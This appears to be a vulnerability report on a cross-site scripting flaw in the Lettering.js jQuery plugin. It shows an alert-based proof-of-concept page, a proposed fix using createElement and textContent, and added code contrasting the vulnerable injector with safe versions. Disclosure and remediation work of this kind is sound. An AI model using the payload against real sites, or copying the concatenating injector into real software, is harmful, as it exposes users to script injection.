Open
The injector first extracts the DOM text representation, then inserts it into HTML:
Lettering.js/jquery.lettering.js, line 20 in d06bb73:
inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;
Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.
Solution
Create the <span> programmatically using document.createElement and set the content using textContent.
Exploit
<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert("I'm properly escaped HTML");&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>
A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.
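The following is an added example, not code from Lettering.js or from the reporter. It places an injector modelled on the quoted line 20 next to the fix the report proposes (document.createElement plus textContent), and adds a string-only variant that escapes before concatenation for code paths that must keep building markup as a string. The names vulnerableInject, safeInject, letteringSafe, safeInjectString and escapeHtml are chosen here, and the sample text is constructed to mirror what .text() returns for the escaped node in the exploit page.

```javascript
// Added example (not Lettering.js code). Contrast of a string-concatenating
// injector, the DOM-based fix the report proposes, and an escaping variant.

// Modelled on the quoted line 20: items are concatenated into HTML, so text
// that the server escaped ("&lt;script&gt;") comes back out of .text() as
// "<script>" and is parsed as live markup once injected with .html().
function vulnerableInject(items, klass, after) {
  after = after === undefined ? '' : after;
  var inject = '';
  items.forEach(function (item, i) {
    inject += '<span class="' + klass + (i + 1) + '" aria-hidden="true">' + item + '</span>' + after;
  });
  return inject;
}

// The proposed fix: build each <span> as a node and assign the text through
// textContent, which the browser never parses as HTML. `doc` is the Document
// to create nodes with (window.document in a browser); it is passed in so the
// function depends on no globals.
function safeInject(items, klass, after, doc) {
  after = after === undefined ? '' : after;
  var frag = doc.createDocumentFragment();
  items.forEach(function (item, i) {
    var span = doc.createElement('span');
    span.className = klass + (i + 1);
    span.setAttribute('aria-hidden', 'true');
    span.textContent = item; // stays text even when it reads "<script>"
    frag.appendChild(span);
    if (after) {
      frag.appendChild(doc.createTextNode(after)); // separator, e.g. ' ' for words
    }
  });
  return frag;
}

// Drop-in element-level replacement for the injector: split the element's
// text, keep the aria-label the plugin sets, and replace the children with
// the safely built spans. Browser only (needs a real Element).
function letteringSafe(el, splitter, klass, after) {
  var text = el.textContent;
  var items = text.split(splitter);
  if (!items.length) return;
  el.setAttribute('aria-label', text);
  el.textContent = '';
  el.appendChild(safeInject(items, klass, after, el.ownerDocument));
}

// String-only alternative for code that must keep producing markup text:
// escape every item before concatenation. Equivalent result to textContent
// for the characters that matter here.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

function safeInjectString(items, klass, after) {
  after = after === undefined ? '' : after;
  var inject = '';
  items.forEach(function (item, i) {
    inject += '<span class="' + klass + (i + 1) + '" aria-hidden="true">' + escapeHtml(item) + '</span>' + after;
  });
  return inject;
}

// Constructed sample: what .text() yields for a node the server rendered as
// "&lt;script&gt;alert(...)&lt;/script&gt;" (the exploit page's div).
var sampleText = '<script>alert("I\'m properly escaped HTML");</script>';
console.log(vulnerableInject([sampleText], 'line'));  // contains a live <script> tag
console.log(safeInjectString([sampleText], 'line'));  // &lt;script&gt;... stays text
```

In a browser, letteringSafe(document.getElementById('exploitme'), '', 'char', '') reproduces the default character split without re-parsing the text; the "words" method corresponds to splitter ' ' with after ' '. The plugin's "lines" method first turns <br> children into a marker string before splitting, and that step is not reproduced here.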